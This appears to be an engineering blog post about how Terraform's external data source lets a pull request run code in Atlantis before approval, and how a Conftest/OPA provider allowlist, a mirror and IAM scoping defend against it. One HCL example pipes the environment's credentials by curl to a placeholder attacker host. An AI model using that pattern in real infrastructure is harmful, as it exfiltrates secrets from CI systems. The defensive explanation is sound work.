Many organizations use infrastructure-as-code (IaC) with pull request (PR) automation to provide a more secure, safe environment for making infrastructure changes. Despite the power and flexibility of IaC software, the lack of strong, secure defaults in PR automation software can make that sense of security a false one.
Infrastructure-as-code and pull request automation
IaC enables a declarative, reusable, and auditable way to manage configuration changes. At DoorDash, the primary platform for this is Terraform, operated through account-isolated, specifically configured Atlantis instances running in ECS and backed by GitHub.
This type of configuration can be used to manage a myriad of infrastructure, such as Okta, Stripe, Chronosphere, or AWS. For the purposes of this article, we'll focus on AWS.
A basic workflow for creating an AWS Account could be as simple as creating a new GitHub repository from a template and then issuing a PR against a repository containing the IaC for the account managing the AWS Organization. Atlantis automatically plans on the newly issued PR, and an admin, engineer, or other authorized personnel reviews and approves the proposed changes as appropriate. Upon approval, someone with access to comment on PRs, such as the author or an approver, can leave the comment "atlantis apply," instructing Atlantis to execute the proposed plan and merge the PR upon success.
Because the Atlantis instance is isolated to the specific AWS Account and only executes the plan post-approval, one would assume that this is a safe setup. However...
Bypassing approval
By default, Atlantis dutifully executes terraform plan in directories where changes to specific files, for example *.hcl, have been made. terraform apply cannot be run unless the PR has been approved. Terraform, however, is a flexible and powerful tool. Terraform providers execute code at plan time and can be pulled from outside the public registry. A user with the ability to open PRs could host, fetch, and execute a malicious provider to circumvent PR approval requirements. In fact, such a user wouldn't even need to host a malicious provider. An official provider, external, contains a data source which can be used to tell Atlantis to do pretty much anything.
The troubling fact is that the external data source can execute arbitrary code at plan time with the same privileges and in the same environment as Atlantis, allowing arbitrary changes to be made without any need for review or approval.
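To illustrate the risk, here is a minimal, hypothetical example of HCL that a malicious PR could contain. The attacker URL is a placeholder; the point is that the external data source runs its program during terraform plan, before any approval:

```hcl
# Hypothetical illustration only. The external data source executes the
# given program at plan time, with Atlantis's privileges and environment.
# "attacker.example.com" is a placeholder, not a real endpoint.
data "external" "exfiltrate" {
  program = [
    "/bin/sh", "-c",
    # Post Atlantis's environment variables (often containing credentials)
    # to an attacker-controlled host, then emit the empty JSON object the
    # external data source requires on stdout.
    "env | curl -s -X POST --data-binary @- https://attacker.example.com/ > /dev/null; echo '{}'"
  ]
}
```

Because hashicorp/external is an official provider, Terraform installs it automatically; no suspicious provider source ever appears in the diff under review.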
Plugging the leak
Atlantis has powerful server-side customization that allows customized default plan and apply workflows, provided it is not configured to allow repositories to provide their own configuration customization. This enables running tools such as Conftest against Open Policy Agent (OPA) policies that define an allowed list of providers before terraform plan is executed. Given the large number of providers available in the Terraform Registry and the means to use providers from unlimited sources, a strict allowlist of providers removes the ability to apply changes or leak environmental data at plan time.
To create such an allowlist, it's important to let Terraform resolve its dependency graph instead of trying to parse required_providers because unapproved providers can be referenced by external modules and their transitive dependencies. Once the dependency graph is resolved with terraform init, all required providers can be found in the dependency lock file alongside version and checksum information. Here is an example server-side config validating an allowlist of providers against the dependency lock file:
```yaml
repos:
  - id: /.*/
    branch: /^main$/
    apply_requirements: [approved, mergeable]
    workflow: opa
workflows:
  opa:
    plan:
      steps:
        - init
        - run: conftest test --update s3::https://s3.amazonaws.com/bucket/opa-rules --namespace terraform.providers .terraform.lock.hcl
        - plan
```
A starter policy evaluating just the provider source address appears as follows:
```rego
package terraform.providers

allowed_providers = {
  "registry.terraform.io/hashicorp/aws",
  "registry.terraform.io/hashicorp/helm",
  "registry.terraform.io/hashicorp/kubernetes",
  "registry.terraform.io/hashicorp/vault",
}

deny[msg] {
  input.provider[name]
  not allowed_providers[name]
  msg = sprintf("Provider `%v` not allowed", [name])
}
```
With version and checksum information available in the dependency lock file, OPA policies could enforce not just certain providers but also non-vulnerable versions and known checksums.
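As a sketch of such an extension, an additional deny rule could reject a specific known-vulnerable version of an otherwise-allowed provider. The version number here is purely illustrative, and the exact input path may differ depending on how your Conftest version parses the lock file's labeled blocks:

```rego
# Sketch: deny a hypothetical known-vulnerable provider version.
# "3.0.0" is an illustrative placeholder, not a real advisory; adjust
# the input path if your Conftest parser nests block attributes in a list.
deny[msg] {
  provider := input.provider[name]
  provider.version == "3.0.0"
  msg = sprintf("Provider `%v` version %v is not allowed", [name, provider.version])
}
```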
With these precautions, if a bad actor attempts to use the dangerous data source in their HCL, Atlantis will halt before planning:
```
FAIL - .terraform.lock.hcl - terraform.providers - Provider `registry.terraform.io/hashicorp/external` not allowed

1 tests, 0 passed, 0 warnings, 1 failure, 0 exceptions
```
The developer experience can be improved by adding a prescriptive error message and defining a process for expanding the provider allowlist. Additionally, a feature can be added to the custom workflow to allow authorized users or groups in GitHub to permit a dangerous plan anyway with a PR comment.
Note that the above implementation relies on the existence of the dependency lock file (.terraform.lock.hcl), which did not exist prior to Terraform 0.14. We recommend enforcing a minimum version of Terraform to prevent downgrade attacks. If you need to support older versions of Terraform, "terraform version" returns provider information starting in 0.11 with JSON output added in 0.13.
Alternative approaches to implementing provider validation include hosting an internal registry and using a network mirror or baking providers into your image and using -plugin-dir.
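For instance, the network mirror approach can be enforced through the Terraform CLI configuration file. In this sketch, the mirror URL is a placeholder for an internal registry:

```hcl
# Sketch of a Terraform CLI configuration (e.g., ~/.terraformrc) that
# forces all provider installation through an internal network mirror.
# The mirror URL is a placeholder.
provider_installation {
  network_mirror {
    url = "https://terraform-mirror.internal.example.com/providers/"
  }
  # With no "direct" block, providers absent from the mirror
  # cannot be installed at all.
}
```

This shifts enforcement from policy evaluation to provider availability: a provider that isn't mirrored simply can't be fetched.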
Reducing review fatigue
Such a workflow can require quite a few people to get anything done. Consider: an engineer simply wants to update a configuration property, but every change requires a review. This can grind productivity to a halt and make for an unpleasant day spent waiting to do something as simple as increasing a memory limit on an EC2 instance.
With Conftest and OPA, specific resources can be allow- or deny-listed, permitting some specific changes without needing approval while others would be specifically flagged for approval.
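As a sketch of how this could work, a policy run against the JSON representation of a plan (terraform show -json) could flag only changes to resource types outside an auto-approved set. The package name and resource types below are illustrative assumptions, not part of the workflow described above:

```rego
package terraform.changes

# Sketch: resource types whose changes are considered safe enough to
# skip specialist review. This list is purely illustrative.
auto_approved_types = {
  "aws_ecs_service",
  "aws_cloudwatch_metric_alarm",
}

# Flag for approval any planned change to a resource type outside the
# auto-approved set. Input is the output of `terraform show -json`.
deny[msg] {
  change := input.resource_changes[_]
  change.change.actions[_] != "no-op"
  not auto_approved_types[change.type]
  msg = sprintf("Change to `%v` requires approval", [change.address])
}
```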
Additionally, approval for changes to specific properties can be delegated to non-specialized teams in GitHub by adjusting CODEOWNERS and writing the HCL in such a way that it reads the property values from non-Terraform files such as .txt files. For example:
```hcl
locals {
  users = var.users != null ? var.users : (
    var.read_users_from_file == null ? [] : [
      for user in split("\n", chomp(file(var.read_users_from_file))) :
      user
      if trimspace(user) != "" && substr(trimspace(user), 0, 1) != "#"
    ]
  )
  set_users = toset(distinct(local.users))
}
```
The combination of these two techniques can pre-determine that a number of changes are explicitly safe, significantly reducing the need for review by a team member from security or infrastructure engineering.
Management nightmare
Recall the configuration of Atlantis. For safety, each AWS Account has its own instance of Atlantis so that a misconfigured or compromised instance in one account can't make changes in another account. Each instance runs in Elastic Container Service (ECS) with separately configured containers. Every change to the workflow configuration currently requires a PR. In large AWS Organizations, this can result in a significant number of PRs, making the process tedious.
Presently, Atlantis is tedious to manage en masse. Simplifying this process is a priority, but requires planning. Some design changes can be made to help. For example, workflow configuration can come from a service or source control management system. Additionally, we can create limited-purpose cross-account AWS Identity and Access Management (IAM) Roles to permit updating of all Atlantis ECS Service Task Definitions and Services. Doing so, however, requires planning to limit unknown/unreviewed/unofficial images being used in the Task Definitions as well as monitoring of CloudTrail logs to reduce the chance of unauthorized changes.
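As a sketch of such a limited-purpose role, the cross-account permissions policy might allow only the ECS actions needed to roll out new task definitions. The cluster and service names below are illustrative, and a production policy would need tighter scoping plus the image and CloudTrail controls noted above:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "RegisterAtlantisTaskDefinitions",
      "Effect": "Allow",
      "Action": "ecs:RegisterTaskDefinition",
      "Resource": "*"
    },
    {
      "Sid": "UpdateAtlantisServices",
      "Effect": "Allow",
      "Action": "ecs:UpdateService",
      "Resource": "arn:aws:ecs:*:*:service/atlantis-*/atlantis"
    }
  ]
}
```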
Conclusion
Any sufficiently powerful tool is unlikely to come without risk, so it's important to review the functionality of tools and systems in the critical path of a workflow. A misconfigured build environment could lead to remote code execution on a developer or continuous integration (CI) machine; a misconfigured PR automation system could lead to something similar, or worse. Maintaining safe operations calls for treating such review findings as critical and addressing them.
Simple roadblocks may provide security but often lead to fatiguing inefficiencies. Few people will continue to use a secure system that they don't enjoy or that bogs down the entire process. Being mindful of this provides opportunities to explore ways to reduce inefficiency while maintaining excellent security, increasing developer velocity, and reducing fatigue.
Batten down the hatches, full steam ahead!